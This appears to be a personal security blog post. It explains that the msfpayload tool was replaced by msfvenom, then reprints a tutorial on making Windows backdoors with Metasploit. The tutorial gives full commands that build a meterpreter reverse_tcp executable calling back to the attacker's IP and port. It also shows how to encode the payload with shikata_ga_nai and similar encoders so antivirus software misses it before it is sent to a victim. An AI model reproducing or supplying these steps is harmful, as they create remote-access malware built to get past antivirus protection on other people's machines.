How to solve msfpayload command not found in Kali Linux [Tutorial]

msfpayload-command-not-found

Hey, There is Vijay  kumar, Welcome on my Blog!

msfpayload command not found is a big problem, As you know msfpayload was a very effective tool to generate payload and msfencoder for encoding payload by using good encoder. There are lots of articles, books related to generate Trojan, payload by using this utility available on different sources. some days back I have written article Creating Trojan Horse (Encoded)By Using Msfpayload but it is useless. Now days I have installed metasploit-framework on linux OS and run commad and I will get the error “msfpayload command not found”

msfpayload-command-not-found

Why does msfpayload command not found ?

As mentioned in the blog post was published by rapid7 on Jun 8th 2015, goodbye msfpayload and msfencode. And rapid7 has removed both commands.

So what is next?

msfpayload command not found – solution

when they removed those command they provided a strong working platform combination of msfpayload and msfencode called msfvenom. Now run the msfvenom command to create a payload (trojan, backdor) and encode by using it. there is no more difference for generating payload. I have written an good article MSFvenom replacement of MSFpayload and msfencode – Full guide on msfvenom.

Problem solved

Cheers!

Creating a Backdoor encoded by msfpayload

Backdoor

A backdoor is a program, therefore, A security researcher can generate, upload, and execute a backdoor program. Backdoors do not work with any functional program for example Trojan horse, but they are hidden inside such type program. Many of Trojan horse have hidden backdoor inside it. In this tutorial you will be able to learn “how to create backdoor and as well as Trojan horses. Let’s create a directory named “backdoors”, which will contain all created Trojan and backdoor earlier.

#mkdir /tmp/backdoors

Backdoors with metasploit:

Metasploit is a great framework, highly recommended for exploitation and maintaining access. As we discussed before The Graphical Interface of Metasploit is powerful, however, Command line is more impressive with full functionality. Msfpayload command is used to generate binaries, for various platform Microsoft and Linux platforms, as well as web applicatios.

#msfplayload windows/meterpreter/reverse_tcp S

msfpayload create an encoded backdoor

Msfpayload can be work with msfencode tools to encode the created binaries to evade antivirus detection.

Creating an Executable Binary (unencoded) by msfpayload

To see the current list of available payload in Metasploit, use msfpayload –l in command line. The given steps will use “windows/meterpreter/reverse_tcp S command. This command will display all available option needed to be set by penetration tester while converting payload into an executable binary file.

The msfpayload tools come equipped to pipe the payload with in following formats:

[C] C

[H] C-Sharp

[P] Perl

[Y] Ruby

[R] Raw

[J] JavaScript

[X] Executable

[D] Dynamic Link Library (DLL)

[V] VBA

[W] War

[N] Python

With the majority of the data required, the analyzer can create an executable binary with the following command. Note that this is a single command and ought to be entered on a single line.

#msfpayload windows/meterpreter/reverse_tcp LHOST={Your_Ip} LPORT={Desiered_port_No} x > /tmp/backdoors/payload.exe

msfpayload create a backdoor

Following image shows the output from the creation of the payload.exe backdoor.

Creating an Executable Binary from a Payload (Encoded)

Many of times payloads.exe is detected by Antivirus, In this situation Pentester have encode payload before sending to the victim. Following command is used to create encoded payload

#msfpayload windows/meterpreter/reverse_tcp LHOST={Local_IP_Address} LPORT={Local_Port} R | msfencode –e x86/countdown –c 2 –t raw | msfencode –x –t exe –e x86/shikata_ga_nai –c 3 –k –o /tmp/backdoors/encodedPayload.exe

Output shown below in the figure :

msfpayload show the option of payloads